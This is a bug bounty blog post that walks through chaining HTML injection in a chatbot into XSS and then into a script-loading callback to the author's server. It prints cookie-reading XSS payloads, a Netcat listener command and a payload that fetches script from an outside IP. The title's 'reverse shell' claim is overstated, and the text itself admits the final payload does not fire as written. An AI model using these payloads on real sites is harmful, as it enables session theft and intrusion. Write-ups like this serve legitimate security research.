The Ultimate Guide to Chaining Bugs: How I Found a Reverse Shell in a Bug Bounty Program
Bug Bounty Hunting
Hello there, and welcome back to my blog!
In this article, I’ll share how I successfully chained an HTML injection into a reverse shell during a bug bounty program. Let’s dive in.
Introduction
I’m Pronay Biswas, a security researcher and bug bounty hunter from West Bengal, India. Recently, I discovered a critical vulnerability by chaining HTML injection to achieve a reverse shell. Here’s a step-by-step account of my journey.
Step 1: Program Selection and Subdomain Enumeration
I chose a program from Bugcrowd and started enumerating subdomains with my subdomain enumeration tool, subdomaindive. I then ran the results through httpx to identify live hosts and picked one subdomain for further exploration. Let’s assume that the subdomain is blog.example.com.
Step 2: Initial Exploration and HTML Injection
Upon visiting the selected subdomain, I found a chatbot feature. Based on my previous experiences with XSS in chatbots, I tested the following XSS payload, but it didn’t work.
<script>alert(1)</script>
Then I tried an HTML injection payload, which worked.
<h1>Click here</h1>
Step 3: Chaining HTML Injection with XSS
Plain HTML injection typically lands in the P4 (low) category on the Bugcrowd VRT, so on its own its impact is minimal. Since the chatbot had blocked the <script> tag but rendered other tags as-is, the obvious next test was an inline event handler on an element that was allowed through. I combined the HTML injection with an XSS payload to raise its impact:
<h1 onmouseover="alert(document.domain)">Click here</h1>
Once injected, the payload renders an h1 heading that reads Click here. Hovering the cursor over it fires the onmouseover handler, and the alert showing the domain name confirmed that my JavaScript was executing in the origin of blog.example.com.
Step 4: Reading Cookies with XSS
As a next step, I tested a payload that displays the value of document.cookie, and I was able to read it successfully. (One caveat: document.cookie only exposes cookies without the HttpOnly flag, so a session cookie with that flag set would not appear in the alert.)
<h1 onmouseover="alert(document.cookie)">Click here</h1>
Once the HTML injection was chained with XSS, the bug was promoted to P2.
Step 5: Elevating to P1 with Reverse Shell
To increase the impact further and move toward P1, I crafted a payload that makes the victim’s browser call back to my VPS. On the VPS I set up a Netcat listener as follows:
nc -lvp 4444
Then I injected the payload below into the chatbot input field. The host and port in the script URL have to match the listener (the listing above uses port 4444 while the payload points at 14806, so adjust one of them before testing):
<h1 style="background:url('nonexistentimage.png')" onerror=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//3.6.115.64:14806'},999)>Test</h1>
What the payload does: every 999 ms the handler appends a new <script> element to the document whose src points at the VPS, so the victim’s browser sends an HTTP GET request to the listener. The Netcat window then shows that raw request, including the Referer (the page the injection fired on) and the User-Agent. Three caveats are worth knowing. First, this is a browser callback rather than an operating-system reverse shell: it proves that attacker-controlled script runs in the victim’s session and can reach attacker infrastructure, which is what the severity claim rests on, but it does not give a shell on the server. Second, browsers do not fire the onerror event on an h1 element when a CSS background-image fails to load; the reliable way to get an error event without user interaction is an element that actually reports load failures, such as <img src=x onerror=...>. Third, the script URL is protocol-relative, so if blog.example.com is served over HTTPS the browser will connect with https:// and a plain Netcat listener will only see TLS handshake bytes; the listener then needs to speak TLS.
Conclusion
By chaining HTML injection into XSS and then into a remote script load that calls back to my server, I was able to increase the impact of this bug significantly, showing how far an apparently low-severity finding can be pushed.
Stay tuned for more updates and insights into my bug bounty journey. Until next time, happy hunting!!!